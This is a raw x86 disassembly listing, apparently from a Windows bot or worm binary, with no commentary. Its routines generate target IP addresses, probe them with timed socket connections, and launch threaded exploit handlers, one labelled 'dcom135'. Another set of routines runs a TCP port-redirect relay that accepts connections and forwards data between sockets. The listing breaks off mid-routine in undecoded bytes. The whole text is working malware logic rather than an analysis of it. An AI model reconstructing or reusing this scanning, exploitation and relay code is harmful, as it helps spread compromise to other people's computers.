push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_4173AC
lea eax, [ebp+var_400]
push edi
push eax
lea eax, [ebp+var_200]
push eax
call sub_4184C0
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
lea eax, [ebp+var_200]
push eax
call sub_40C4F7
add esp, 38h
pop edi
pop ebx
leave
retn
sub_40707C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407146 proc near ; CODE XREF: sub_40F6F1+57F1�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 8
call sub_4170A0
test eax, eax
pop ecx
jle short loc_407182
mov eax, [ebp+arg_C]
push dword_43C658[eax*8]
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset unk_42911C
push eax
call sub_4173AC
add esp, 0Ch
jmp short loc_407195
; ---------------------------------------------------------------------------
loc_407182: ; CODE XREF: sub_407146+13�j
lea eax, [ebp+var_200]
push offset unk_4290EC
push eax
call sub_4173AC
pop ecx
pop ecx
loc_407195: ; CODE XREF: sub_407146+3A�j
push 0
lea eax, [ebp+var_200]
push [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40DC10
lea eax, [ebp+var_200]
push eax
call sub_40C4F7
add esp, 18h
leave
retn
sub_407146 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4071BD proc near ; CODE XREF: sub_4078E6+4F�p
var_210 = dword ptr -210h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_10 = byte ptr 18h
arg_90 = byte ptr 98h
arg_110 = dword ptr 118h
arg_130 = dword ptr 138h
arg_138 = dword ptr 140h
arg_13C = dword ptr 144h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_130]
push ebx
cmp eax, 0FFFFFFFFh
push esi
jz loc_40754D
imul eax, 3Ch
xor ebx, ebx
cmp dword_428C04[eax], ebx
jz loc_40742E
push 4
call sub_4170A0
test eax, eax
pop ecx
jnz loc_40754D
mov eax, dword_42ECE4
push edi
mov edi, offset dword_43F554
push 104h
push edi
push ebx
mov dword_43F764, eax
mov dword_43F760, ebx
nop
call near ptr 7C80B4CFh
push 103h
mov esi, offset dword_43F658
push offset byte_42EDC4
push esi
call sub_4182F0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_43F550, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword_43F7E8, eax
jnz short loc_407270
lea eax, [ebp+arg_10]
push eax
push offset dword_43F768
call sub_4182F0
add esp, 0Ch
mov dword_43F7EC, 1
jmp short loc_40728A
; ---------------------------------------------------------------------------
loc_407270: ; CODE XREF: sub_4071BD+94�j
lea eax, [ebp+arg_90]
push eax
push offset dword_43F768
call sub_4182F0
add esp, 0Ch
mov dword_43F7EC, ebx
loc_40728A: ; CODE XREF: sub_4071BD+B1�j
push esi
push edi
push dword_43F764
lea eax, [ebp+var_204]
push offset unk_4292AC
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_416E58
add esp, 20h
mov dword_43F75C, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_43F550
push offset sub_406B85
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, dword_43F75C
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_4072F9
loc_4072E7: ; CODE XREF: sub_4071BD+13A�j
cmp dword_43F7F0, ebx
jnz short loc_407314
push 32h
nop
call near ptr 7C802442h
jmp short loc_4072E7
; ---------------------------------------------------------------------------
loc_4072F9: ; CODE XREF: sub_4071BD+128�j
nop
call near ptr 7C910331h
push eax
lea eax, [ebp+var_204]
push offset unk_42926C
push eax
call sub_4173AC
add esp, 0Ch
loc_407314: ; CODE XREF: sub_4071BD+130�j
lea eax, [ebp+var_204]
push eax
call sub_40C4F7
mov edi, offset dword_43FBAC
mov [esp+210h+var_210], 104h
push edi
push ebx
mov dword_43FDB8, ebx
nop
call near ptr 7C80B4CFh
push 103h
mov esi, offset dword_43FCB0
push offset byte_42EDC4
push esi
call sub_4182F0
mov eax, [ebp+arg_110]
add esp, 0Ch
cmp [ebp+arg_90], bl
mov dword_43FBA8, eax
mov eax, [ebp+arg_138]
push 7Fh
mov dword_43FE40, eax
jnz short loc_40738F
lea eax, [ebp+arg_10]
push eax
push offset dword_43FDC0
call sub_4182F0
add esp, 0Ch
mov dword_43FE44, 1
jmp short loc_4073A9
; ---------------------------------------------------------------------------
loc_40738F: ; CODE XREF: sub_4071BD+1B3�j
lea eax, [ebp+arg_90]
push eax
push offset dword_43FDC0
call sub_4182F0
add esp, 0Ch
mov dword_43FE44, ebx
loc_4073A9: ; CODE XREF: sub_4071BD+1D0�j
push esi
push edi
push dword_43FDBC
lea eax, [ebp+var_204]
push offset dword_42921C
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_416E58
add esp, 20h
mov dword_43FDB4, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_43FBA8
push offset sub_405350
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, dword_43FDB4
pop edi
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_40741D
loc_407407: ; CODE XREF: sub_4071BD+25E�j
cmp dword_43FE48, ebx
jnz loc_407540
push 32h
nop
call near ptr 7C802442h
jmp short loc_407407
; ---------------------------------------------------------------------------
loc_40741D: ; CODE XREF: sub_4071BD+248�j
nop
call near ptr 7C910331h
push eax
push offset dword_4291DC
jmp loc_407531
; ---------------------------------------------------------------------------
loc_40742E: ; CODE XREF: sub_4071BD+25�j
cmp dword_428C08[eax], ebx
jz loc_40754D
push 3
call sub_4170A0
test eax, eax
pop ecx
jnz loc_40754D
mov esi, offset dword_43FA84
push 104h
push esi
push ebx
nop
call near ptr 7C80B4CFh
push 5Ch
push esi
call sub_4185F0
pop ecx
cmp eax, ebx
pop ecx
jz short loc_40746C
mov [eax], bl
loc_40746C: ; CODE XREF: sub_4071BD+2AB�j
mov eax, dword_42ECE8
mov dword_43FB9C, ebx
mov dword_43FB88, eax
lea eax, [ebp+arg_10]
push eax
push offset dword_43F7FC
call sub_4173AC
mov eax, [ebp+arg_110]
pop ecx
pop ecx
mov dword_43F7F8, eax
mov ecx, [ebp+arg_138]
push esi
push dword_43FB88
mov dword_43FB94, ecx
mov ecx, [ebp+arg_13C]
push eax
mov dword_43FB98, ecx
call sub_40AFAB
pop ecx
push eax
lea eax, [ebp+var_204]
push offset unk_429190
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_204]
push 3
push eax
call sub_416E58
add esp, 20h
mov dword_43FB90, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_43F7F8
push offset sub_405A6A
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, dword_43FB90
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_407525
loc_407513: ; CODE XREF: sub_4071BD+366�j
cmp dword_43FBA4, ebx
jnz short loc_407540
push 32h
nop
call near ptr 7C802442h
jmp short loc_407513
; ---------------------------------------------------------------------------
loc_407525: ; CODE XREF: sub_4071BD+354�j
nop
call near ptr 7C910331h
push eax
push offset unk_42914C
loc_407531: ; CODE XREF: sub_4071BD+26C�j
lea eax, [ebp+var_204]
push eax
call sub_4173AC
add esp, 0Ch
loc_407540: ; CODE XREF: sub_4071BD+250�j
; sub_4071BD+35C�j
lea eax, [ebp+var_204]
push eax
call sub_40C4F7
pop ecx
loc_40754D: ; CODE XREF: sub_4071BD+14�j
; sub_4071BD+35�j ...
pop esi
pop ebx
leave
retn
sub_4071BD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407551 proc near ; CODE XREF: sub_4076D2:loc_407743�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
push 4
lea esi, ds:43C658h[eax*8]
lea eax, [ebp+arg_0]
push esi
push eax
call sub_417490
add esp, 0Ch
push [ebp+arg_0]
call dword_4412EC ; ntohl
inc eax
push eax
mov [ebp+arg_0], eax
call dword_4413B4 ; ntohl
mov [ebp+arg_0], eax
lea eax, [ebp+arg_0]
push 4
push eax
push esi
call sub_417490
mov eax, [esi]
add esp, 0Ch
pop esi
pop ebp
retn
sub_407551 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407599 proc near ; CODE XREF: sub_4076D2+69�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
or esi, 0FFFFFFFFh
push [ebp+arg_0]
mov [ebp+var_C], esi
mov [ebp+var_8], esi
mov [ebp+var_4], esi
mov [ebp+var_10], esi
call sub_417AF0
cmp eax, 0Fh
pop ecx
jbe short loc_4075C1
xor eax, eax
jmp short loc_407632
; ---------------------------------------------------------------------------
loc_4075C1: ; CODE XREF: sub_407599+22�j
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_417FCC
add esp, 18h
cmp [ebp+var_C], esi
jnz short loc_4075EE
call sub_417408
mov [ebp+var_C], eax
loc_4075EE: ; CODE XREF: sub_407599+4B�j
cmp [ebp+var_8], esi
jnz short loc_4075FB
call sub_417408
mov [ebp+var_8], eax
loc_4075FB: ; CODE XREF: sub_407599+58�j
cmp [ebp+var_4], esi
jnz short loc_407608
call sub_417408
mov [ebp+var_4], eax
loc_407608: ; CODE XREF: sub_407599+65�j
mov eax, [ebp+var_10]
cmp eax, esi
jnz short loc_407614
call sub_417408
loc_407614: ; CODE XREF: sub_407599+74�j
shl eax, 8
add eax, [ebp+var_4]
mov ecx, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_8]
shl eax, 8
add eax, ecx
mov ecx, [ebp+arg_4]
mov dword_43C658[ecx*8], eax
loc_407632: ; CODE XREF: sub_407599+26�j
pop esi
leave
retn
sub_407599 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407635 proc near ; CODE XREF: sub_4076D2+B8�p
; sub_40DA5C+30�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
push 1
pop edi
xor ebx, ebx
push ebx
push edi
push 2
mov [ebp+var_4], edi
call dword_441438 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_40765E
xor eax, eax
jmp short loc_4076CD
; ---------------------------------------------------------------------------
loc_40765E: ; CODE XREF: sub_407635+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_4413B8 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_441454 ; ioctlsocket
lea eax, [ebp+var_1C]
push 10h
push eax
push esi
call dword_441360 ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_8], ebx
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_120]
push ebx
push eax
push ebx
push ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_4413A0 ; select
push esi
mov edi, eax
call dword_441450 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_4076CD: ; CODE XREF: sub_407635+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_407635 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4076D2 proc near ; DATA XREF: sub_4078E6+13B�o
var_2A8 = dword ptr -2A8h
var_28C = byte ptr -28Ch
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_1F8 = byte ptr -1F8h
var_178 = byte ptr -178h
var_16C = dword ptr -16Ch
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_150 = byte ptr -150h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_150]
rep movsd
mov esi, [ebp+var_2C]
mov dword ptr [eax+148h], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], esi
mov [ebp+arg_0], eax
nop
call near ptr 7C80929Ch
push eax
call sub_4173FE
mov ebx, esi
pop ecx
imul ebx, 234h
loc_407719: ; CODE XREF: sub_4076D2+200�j
mov eax, dword_446E14[ebx]
cmp dword_43C65C[eax*8], 0
jz loc_4078D7
cmp [ebp+var_10], 0
push eax
jz short loc_407743
lea eax, [ebp+var_150]
push eax
call sub_407599
pop ecx
jmp short loc_407748
; ---------------------------------------------------------------------------
loc_407743: ; CODE XREF: sub_4076D2+60�j
call sub_407551
loc_407748: ; CODE XREF: sub_4076D2+6F�j
pop ecx
mov edi, eax
push [ebp+arg_0]
push dword_446E14[ebx]
push [ebp+var_3C]
push edi
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_429340
push eax
call sub_4173AC
lea eax, [ebp+var_28C]
push eax
lea eax, dword_446C10[ebx]
push eax
call sub_4173AC
push [ebp+var_38]
push [ebp+var_3C]
push edi
call sub_407635
add esp, 2Ch
cmp eax, 1
jnz loc_4078C7
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_40781C
push offset dword_43F538
nop
call near ptr 7C901005h
push [ebp+var_3C]
push edi
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_28C]
push offset unk_429308
push eax
call sub_4173AC
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_4077FE
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_28C]
push eax
lea eax, [ebp+var_C0]
jnz short loc_4077F2
lea eax, [ebp+var_140]
loc_4077F2: ; CODE XREF: sub_4076D2+118�j
push eax
push [ebp+var_40]
call sub_40DC10
add esp, 14h
loc_4077FE: ; CODE XREF: sub_4076D2+FD�j
lea eax, [ebp+var_28C]
push eax
call sub_40C4F7
mov [esp+2A8h+var_2A8], offset dword_43F538
nop
call near ptr 7C9010EDh
jmp loc_4078C7
; ---------------------------------------------------------------------------
loc_40781C: ; CODE XREF: sub_4076D2+CD�j
push edi
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_208]
push eax
call sub_4173AC
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aDcom135_0 ; "dcom135"
push eax
lea eax, [ebp+var_178]
push eax
call sub_4173AC
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_407860
lea eax, [ebp+var_140]
loc_407860: ; CODE XREF: sub_4076D2+186�j
push eax
lea eax, [ebp+var_1F8]
push eax
call sub_4173AC
mov eax, [ebp+var_40]
pop ecx
mov [ebp+var_20C], eax
mov eax, [ebp+var_18]
mov [ebp+var_15C], eax
mov eax, [ebp+var_14]
mov [ebp+var_158], eax
mov eax, [ebp+var_3C]
mov [ebp+var_16C], eax
mov eax, [ebp+var_20]
pop ecx
mov [ebp+var_164], eax
imul eax, 3Ch
sub esp, 0BCh
mov [ebp+var_168], esi
lea esi, [ebp+var_20C]
push 2Fh
pop ecx
mov edi, esp
rep movsd
call off_428BFC[eax]
mov esi, [ebp+var_4]
add esp, 0BCh
loc_4078C7: ; CODE XREF: sub_4076D2+C3�j
; sub_4076D2+145�j
push 7D0h
nop
call near ptr 7C802442h
jmp loc_407719
; ---------------------------------------------------------------------------
loc_4078D7: ; CODE XREF: sub_4076D2+55�j
push esi
call sub_417174
pop ecx
push 0
nop
call near ptr 7C80C058h
sub_4076D2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4078E6 proc near ; DATA XREF: sub_40F6F1+3417�o
; sub_40F6F1+53A7�o
var_1DC = dword ptr -1DCh
var_1CC = byte ptr -1CCh
var_14C = byte ptr -14Ch
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1CCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 53h
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
push 1
pop ebx
rep movsd
mov [eax+144h], ebx
lea eax, [ebp+var_14C]
push eax
call dword_4413F8 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 14Ch
lea esi, [ebp+var_14C]
push 53h
mov dword_43C658[ecx*8], eax
pop ecx
mov edi, esp
rep movsd
call sub_4071BD
push 8
call sub_4170A0
add esp, 150h
cmp eax, ebx
jnz short loc_4079B4
mov esi, offset dword_43F538
push esi
nop
call near ptr 7C91188Ah
push 80000400h
push esi
nop
call near ptr 7C80B829h
test eax, eax
jnz short loc_4079B4
lea eax, [ebp+var_1CC]
push offset unk_429474
push eax
call sub_4173AC
xor ebx, ebx
pop ecx
cmp [ebp+var_10], ebx
pop ecx
jnz short loc_40799E
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40DC10
add esp, 14h
loc_40799E: ; CODE XREF: sub_4078E6+99�j
lea eax, [ebp+var_1CC]
push eax
call sub_40C4F7
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_4079B4: ; CODE XREF: sub_4078E6+63�j
; sub_4078E6+7F�j
mov eax, [ebp+var_2C]
mov esi, dword_421070
mov edi, ebx
mov dword_43C65C[eax*8], ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_407A81
loc_4079D2: ; CODE XREF: sub_4078E6+195�j
push edi
lea eax, [ebp+var_14C]
push [ebp+var_2C]
mov [ebp+var_24], edi
push [ebp+var_38]
push eax
lea eax, [ebp+var_1CC]
push offset unk_42942C
push eax
call sub_4173AC
push ebx
lea eax, [ebp+var_1CC]
push 8
push eax
call sub_416E58
mov [ebp+var_28], eax
imul eax, 234h
mov ecx, [ebp+var_2C]
add esp, 24h
mov dword_446E14[eax], ecx
lea eax, [ebp+var_14C]
push ebx
push ebx
push eax
push offset sub_4076D2
push ebx
push ebx
nop
call near ptr 7C810637h
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_446E24[ecx], eax
jz short loc_407A4C
loc_407A41: ; CODE XREF: sub_4078E6+164�j
cmp [ebp+var_4], ebx
jnz short loc_407A73
push 1Eh
call esi ; Sleep
jmp short loc_407A41
; ---------------------------------------------------------------------------
loc_407A4C: ; CODE XREF: sub_4078E6+159�j
nop
call near ptr 7C910331h
push eax
lea eax, [ebp+var_1CC]
push offset unk_4293E0
push eax
call sub_4173AC
lea eax, [ebp+var_1CC]
push eax
call sub_40C4F7
add esp, 10h
loc_407A73: ; CODE XREF: sub_4078E6+15E�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_4079D2
loc_407A81: ; CODE XREF: sub_4078E6+E6�j
cmp [ebp+var_30], ebx
jz loc_407B2B
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
loc_407A96: ; CODE XREF: sub_4078E6+250�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_43C658[eax*8]
push eax
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_1CC]
push offset unk_42938C
push eax
call sub_4173AC
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_407AE4
push ebx
lea eax, [ebp+var_1CC]
push [ebp+var_14]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_40DC10
add esp, 14h
loc_407AE4: ; CODE XREF: sub_4078E6+1DF�j
lea eax, [ebp+var_1CC]
push eax
call sub_40C4F7
mov eax, [ebp+var_2C]
mov [esp+1DCh+var_1DC], 0BB8h
mov dword_43C65C[eax*8], ebx
call esi ; Sleep
push 8
call sub_4170A0
cmp eax, 1
pop ecx
jnz short loc_407B1B
push offset dword_43F538
nop
call near ptr 7C91188Ah
loc_407B1B: ; CODE XREF: sub_4078E6+228�j
push [ebp+var_2C]
call sub_417174
pop ecx
push ebx
nop
call near ptr 7C80C058h
loc_407B2B: ; CODE XREF: sub_4078E6+19E�j
; sub_4078E6+25D�j
mov eax, [ebp+var_2C]
cmp dword_43C65C[eax*8], 1
jnz loc_407A96
push 7D0h
call esi ; Sleep
jmp short loc_407B2B
sub_4078E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407B45 proc near ; DATA XREF: sub_40F6F1+37EB�o
var_34C = byte ptr -34Ch
var_14C = byte ptr -14Ch
var_148 = dword ptr -148h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = byte ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 34Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp+var_14C]
rep movsd
push 1
xor esi, esi
pop edi
push 10h
mov [eax+120h], edi
pop ebx
lea eax, [ebp+var_10]
push ebx
push esi
push eax
call sub_417430
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+var_40]
call dword_4413B8 ; ntohs
push 6
push edi
push 2
mov [ebp+var_E], ax
mov [ebp+var_C], esi
mov [ebp+arg_0], ebx
call dword_441438 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_407CA9
mov eax, [ebp+var_3C]
push edi
imul eax, 234h
push 401h
push esi
push ebx
mov dword_446E1C[eax], ebx
call dword_4412D4 ; WSAAsyncSelect
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call dword_4413E4 ; bind
test eax, eax
jnz loc_407CA9
push 0Ah
push ebx
call dword_4413E0 ; listen
test eax, eax
jnz loc_407CA9
loc_407BEF: ; CODE XREF: sub_407B45+BE�j
; sub_407B45+13F�j
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_24]
push eax
push ebx
call dword_44144C ; accept
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_407BEF
movzx eax, [ebp+var_22]
push [ebp+var_3C]
mov [ebp+var_148], edi
mov [ebp+var_2C], esi
push eax
push [ebp+var_20]
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp+var_34C]
push offset unk_429508
push eax
call sub_4173AC
push edi
lea eax, [ebp+var_34C]
push 10h
push eax
call sub_416E58
mov [ebp+var_38], eax
imul eax, 234h
mov ecx, [ebp+var_3C]
add esp, 20h
mov dword_446E14[eax], ecx
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_14C]
push esi
push eax
push offset loc_407CCD
push esi
push esi
nop
call near ptr 7C810637h
mov ecx, [ebp+var_38]
imul ecx, 234h
cmp eax, esi
mov dword_446E24[ecx], eax
jz short loc_407C94
loc_407C81: ; CODE XREF: sub_407B45+14D�j
cmp [ebp+var_2C], esi
jnz loc_407BEF
push 32h
nop
call near ptr 7C802442h
jmp short loc_407C81
; ---------------------------------------------------------------------------
loc_407C94: ; CODE XREF: sub_407B45+13A�j
nop
call near ptr 7C910331h
push eax
push offset unk_4294BC
call sub_40C56B
pop ecx
pop ecx
jmp short loc_407CAC
; ---------------------------------------------------------------------------
loc_407CA9: ; CODE XREF: sub_407B45+61�j
; sub_407B45+93�j ...
mov edi, [ebp+arg_0]
loc_407CAC: ; CODE XREF: sub_407B45+162�j
push edi
call dword_441450 ; closesocket
push ebx
call dword_441450 ; closesocket
push [ebp+var_3C]
call sub_417174
pop ecx
push esi
nop
call near ptr 7C80C058h
pop edi
pop esi
pop ebx
sub_407B45 endp ; sp-analysis failed
loc_407CCD: ; DATA XREF: sub_407B45+11C�o
push ebp
mov ebp, esp
mov eax, 1344h
call sub_417B70
mov eax, [ebp+8]
push ebx
push esi
push edi
push 4Ah
mov esi, eax
pop ecx
lea edi, [ebp-144h]
rep movsd
mov ebx, [ebp-30h]
push 1
pop ecx
mov [ebp-4], ebx
push 6
push ecx
push 2
mov [eax+120h], ecx
call dword_441438 ; socket
mov esi, eax
xor edi, edi
cmp esi, 0FFFFFFFFh
mov [ebp+8], esi
jz loc_407E83
push 10h
lea eax, [ebp-18h]
push edi
push eax
call sub_417430
add esp, 0Ch
mov word ptr [ebp-18h], 2
push dword ptr [ebp-3Ch]
call dword_4413B8 ; ntohs
mov [ebp-16h], ax
lea eax, [ebp-13Ch]
push eax
call dword_4413F8 ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp-8], eax
jnz short loc_407D5D
lea eax, [ebp-13Ch]
push eax
call dword_44143C ; gethostbyname
jmp short loc_407D6B
; ---------------------------------------------------------------------------
loc_407D5D: ; CODE XREF: ___:00407D4C�j
push 2
lea eax, [ebp-8]
push 4
push eax
call dword_441370 ; gethostbyaddr
loc_407D6B: ; CODE XREF: ___:00407D5B�j
cmp eax, edi
jz loc_407E83
mov eax, [eax+0Ch]
push 10h
mov eax, [eax]
mov eax, [eax]
mov [ebp-14h], eax
lea eax, [ebp-18h]
push eax
push esi
call dword_441360 ; connect
cmp eax, 0FFFFFFFFh
jz loc_407E83
movzx eax, word ptr [ebp-16h]
push dword ptr [ebp-34h]
mov [ebp-20h], edi
push eax
push dword ptr [ebp-14h]
call dword_441444 ; inet_ntoa
push eax
lea eax, [ebp-344h]
push offset unk_4295B0
push eax
call sub_4173AC
push esi
lea eax, [ebp-344h]
push 10h
push eax
call sub_416E58
imul ebx, 234h
mov [ebp-30h], eax
imul eax, 234h
mov ecx, [ebp-34h]
lea esi, dword_446E1C[ebx]
mov dword_446E14[eax], ecx
add esp, 20h
mov ecx, [esi]
mov dword_446E20[eax], ecx
lea eax, [ebp-1Ch]
push eax
lea eax, [ebp-144h]
push edi
push eax
push offset loc_407EB4
push edi
push edi
nop
call near ptr 7C810637h
mov ecx, [ebp-30h]
imul ecx, 234h
cmp eax, edi
mov dword_446E24[ecx], eax
jz short loc_407E70
loc_407E1D: ; CODE XREF: ___:00407E2A�j
cmp [ebp-20h], edi
jnz short loc_407E2C
push 32h
nop
call near ptr 7C802442h
jmp short loc_407E1D
; ---------------------------------------------------------------------------
loc_407E2C: ; CODE XREF: ___:00407E20�j
mov ebx, 1000h
loc_407E31: ; CODE XREF: ___:00407E6C�j
push ebx
lea eax, [ebp-1344h]
push edi
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp-1344h]
push edi
push ebx
push eax
push dword ptr [esi]
call dword_4413D0 ; recv
cmp eax, edi
jle short loc_407E83
push edi
push eax
lea eax, [ebp-1344h]
push eax
push dword ptr [ebp+8]
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_407E31
jmp short loc_407E83
; ---------------------------------------------------------------------------
loc_407E70: ; CODE XREF: ___:00407E1B�j
nop
call near ptr 7C910331h
push eax
push offset unk_429560
call sub_40C56B
pop ecx
pop ecx
loc_407E83: ; CODE XREF: ___:00407D11�j
; ___:00407D6D�j ...
mov eax, [ebp-4]
imul eax, 234h
push dword_446E1C[eax]
call dword_441450 ; closesocket
push dword ptr [ebp+8]
call dword_441450 ; closesocket
push dword ptr [ebp-4]
call sub_417174
pop ecx
push edi
nop
call near ptr 7C80C058h
pop edi
pop esi
pop ebx
loc_407EB4: ; DATA XREF: ___:00407DFD�o
push ebp
mov ebp, esp
mov eax, 1128h
call sub_417B70
mov eax, [ebp+8]
push esi
push edi
push 4Ah
pop ecx
mov esi, eax
lea edi, [ebp-128h]
rep movsd
mov esi, [ebp-14h]
mov dword ptr [eax+124h], 1
imul esi, 234h
mov edi, 1000h
loc_407EEB: ; CODE XREF: ___:00407F30�j
push edi
lea eax, [ebp-1128h]
push 0
push eax
call sub_417430
add esp, 0Ch
lea eax, [ebp-1128h]
push 0
push edi
push eax
push dword_446E20[esi]
call dword_4413D0 ; recv
test eax, eax
jle short loc_407F32
push 0
push eax
lea eax, [ebp-1128h]
push eax
push dword_446E1C[esi]
call dword_441408 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_407EEB
loc_407F32: ; CODE XREF: ___:00407F15�j
push dword_446E20[esi]
call dword_441450 ; closesocket
push dword ptr [ebp-14h]
call sub_417174
pop ecx
push 0
nop
; ---------------------------------------------------------------------------
dw 9E8h
; ---------------------------------------------------------------------------
inc ecx
inc eax
